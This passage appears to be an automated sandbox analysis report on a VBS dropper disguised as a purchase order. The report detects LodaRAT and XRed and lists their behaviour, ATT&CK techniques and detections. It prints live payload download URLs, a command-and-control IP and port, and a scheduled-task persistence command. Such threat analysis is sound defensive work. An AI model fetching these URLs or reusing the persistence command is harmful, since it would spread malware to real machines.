                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                                Source: wscript.exe, 00000000.00000002.1763425804.00000229948B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: NUHORT.exe, 00000018.00000003.2349387548.00000000018A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
                                Source: Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnd
                                Source: wscript.exe, 00000000.00000002.1763617544.0000022996F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763508004.000002299493F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761565226.000002299493A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.00000000007C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: ._cache_update.exe, 00000007.00000002.2965345252.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023703C BlockInput,7_2_0023703C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,7_2_001E374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002146D0 LoadLibraryExW,GetLastError,LoadLibraryW,6C1F6DE0,6C1F6DE0,6C1F6DE0,6C1F6DE0,6C1F6DE0,IsDebuggerPresent,OutputDebugStringW,7_2_002146D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00F630B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,16_2_00F630B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020A937 GetProcessHeap,7_2_0020A937
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00208E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00208E3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00208E19 SetUnhandledExceptionFilter,7_2_00208E19
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E28E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00E28E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E28E19 SetUnhandledExceptionFilter,16_2_00E28E19
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00208E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00208E3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00208E19 SetUnhandledExceptionFilter,22_2_00208E19

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Benign windows process drops PE files
                                Source: C:\Windows\System32\wscript.exeFile created: RNEQTT[1].exe.0.drJump to dropped file
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021BE95 LogonUserW,7_2_0021BE95
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,7_2_001E374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00224B52 SendInput,keybd_event,7_2_00224B52
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00227DD5 mouse_event,7_2_00227DD5
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,7_2_0021B398
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_0021BE31
                                Source: ._cache_update.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_update.exe, 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp, NUHORT.exe, 00000010.00000002.1960481113.0000000000EAE000.00000040.00000001.01000000.0000000C.sdmp, NUHORT.exe, 00000013.00000002.2012971999.0000000000EAE000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00207254 cpuid 7_2_00207254
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002040DA GetSystemTimeAsFileTime,__aulldiv,7_2_002040DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0025C146 GetUserNameW,7_2_0025C146
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00212C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,7_2_00212C3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_001FE47B
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: ._cache_update.exe, 00000007.00000002.2965345252.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 3104, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected XRed
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 0.3.wscript.exe.229973aa684.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: update.exe PID: 5592, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4F1F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, type: DROPPED
                                Source: NUHORT.exe, 0000001A.00000002.2959933261.0000000000EAE000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: NUHORT.exe, 0000001A.00000003.2944800094.0000000004031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: ._cache_update.exeBinary or memory string: WIN_XP
                                Source: ._cache_update.exeBinary or memory string: WIN_XPe
                                Source: ._cache_update.exeBinary or memory string: WIN_VISTA
                                Source: NUHORT.exe, 00000015.00000002.2183774646.00000000047D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81[
                                Source: ._cache_update.exe, 00000016.00000003.2249565360.00000000042FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81.
                                Source: ._cache_update.exeBinary or memory string: WIN_7
                                Source: ._cache_update.exeBinary or memory string: WIN_8
                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 3104, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 3104, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected XRed
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 0.3.wscript.exe.229973aa684.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: update.exe PID: 5592, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4F1F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,7_2_002391DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_002396E2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,16_2_00E591DC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00E596E2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,22_2_002391DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,22_2_002396E2

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information631
                                Scripting                                		2
                                Valid Accounts                                		11
                                Windows Management Instrumentation                                		631
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		1
                                Disable or Modify Tools                                		21
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		4
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media                                		3
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Peripheral Device Discovery                                		Remote Desktop Protocol21
                                Input Capture                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		1
                                Extra Window Memory Injection                                		31
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares3
                                Clipboard Data                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		1
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object ModelInput Capture314
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd121
                                Registry Run Keys / Startup Folder                                		21
                                Access Token Manipulation                                		1
                                DLL Side-Loading                                		LSA Secrets28
                                System Information Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                                Process Injection                                		1
                                Extra Window Memory Injection                                		Cached Domain Credentials251
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		12
                                Masquerading                                		DCSync121
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job121
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Proc Filesystem3
                                Process Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow11
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation                                		Network Sniffing1
                                System Owner/User Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580572 Sample: Purchase Order No. G0287336... Startdate: 25/12/2024 Architecture: WINDOWS Score: 100 54 freedns.afraid.org 2->54 56 xred.mooo.com 2->56 58 5 other IPs or domains 2->58 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Antivirus detection for URL or domain 2->74 78 21 other signatures 2->78 9 update.exe 1 5 2->9         started        12 wscript.exe 15 2->12         started        16 NUHORT.exe 2->16         started        18 9 other processes 2->18 signatures3 76 Uses dynamic DNS services 54->76 process4 dnsIp5 44 C:\Users\user\AppData\...\._cache_update.exe, PE32 9->44 dropped 46 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->46 dropped 48 C:\ProgramData\Synaptics\RCX4F1F.tmp, PE32 9->48 dropped 20 Synaptics.exe 398 9->20         started        25 ._cache_update.exe 2 5 9->25         started        68 raw.githubusercontent.com 185.199.108.133, 443, 49730 FASTLYUS Netherlands 12->68 50 C:\Users\user\AppData\Roaming\...\update.exe, PE32 12->50 dropped 52 C:\Users\user\AppData\Local\...\RNEQTT[1].exe, PE32 12->52 dropped 88 System process connects to network (likely due to code injection or exploit) 12->88 90 Benign windows process drops PE files 12->90 92 VBScript performs obfuscated calls to suspicious functions 12->92 100 2 other signatures 12->100 27 update.exe 12->27         started        94 Multi AV Scanner detection for dropped file 16->94 96 Machine Learning detection for dropped file 16->96 98 Found API chain indicative of sandbox detection 16->98 file6 signatures7 process8 dnsIp9 60 docs.google.com 142.250.181.14, 443, 49740, 49741 GOOGLEUS United States 20->60 62 drive.usercontent.google.com 142.250.181.97, 443, 49750, 49751 GOOGLEUS United States 20->62 64 freedns.afraid.org 69.42.215.252, 49745, 80 AWKNET-LLCUS United States 20->64 38 C:\Users\user\Documents\~$cache1, PE32 20->38 dropped 80 Antivirus detection for dropped file 20->80 82 Multi AV Scanner detection for dropped file 20->82 84 Drops PE files to the document folder of the user 20->84 86 Machine Learning detection for dropped file 20->86 66 172.111.138.100, 49753, 5552 VOXILITYGB United States 25->66 40 C:\Users\user\AppData\Roaming\...40UHORT.exe, PE32 25->40 dropped 42 C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, ASCII 25->42 dropped 29 cmd.exe 25->29         started        32 wscript.exe 25->32         started        file10 signatures11 process12 signatures13 102 Uses schtasks.exe or at.exe to add and modify task schedules 29->102 34 conhost.exe 29->34         started        36 schtasks.exe 29->36         started        104 Windows Scripting host queries suspicious COM object (likely to drop second stage) 32->104 process14

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Purchase Order No. G02873362-Docx.vbs37%VirustotalBrowse
                                Purchase Order No. G02873362-Docx.vbs29%ReversingLabsWin32.Trojan.Valyria

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\VFNCBO.vbs100%AviraVBS/Runner.VPJI
                                C:\ProgramData\Synaptics\RCX4F1F.tmp100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\RCX4F1F.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\RCX4F1F.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windata\NUHORT.exe100%Joe Sandbox ML
                                C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCX4F1F.tmp100%ReversingLabsWin32.Worm.Zorex
                                C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe53%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Windata\NUHORT.exe53%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Documents\~$cache1100%ReversingLabsWin32.Worm.Zorex

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://drive.userco0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/Synaptics.rar100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/SUpdate.ini100%Avira URL Cloudmalware

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                		69.42.215.252
                                		truefalse
                                  		high
                                  docs.google.com
                                  		142.250.181.14
                                  		truefalse
                                    		high
                                    raw.githubusercontent.com
                                    		185.199.108.133
                                    		truefalse
                                      		high
                                      drive.usercontent.google.com
                                      		142.250.181.97
                                      		truefalse
                                        		high
                                        s-part-0035.t-0009.t-msedge.net
                                        		13.107.246.63
                                        		truefalse
                                          		high
                                          xred.mooo.com
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exefalse
                                              		high
                                              xred.mooo.comfalse
                                                		high
                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://docs.google.com/emeSynaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercoSynaptics.exe, 00000008.00000002.2977437745.000000000755B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drfalse
                                                        		high
                                                        https://docs.google.com/tleniyor...Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/p=Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Tupdate.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/rSynaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/enetleniyor...Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/mSynaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe_wscript.exe, 00000000.00000002.1763617544.0000022996F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://docs.google.com/lSynaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/hSynaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://docs.google.com/userSynaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://ip-score.com/checkip/O6._cache_update.exe, 00000007.00000002.2964576754.0000000000DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
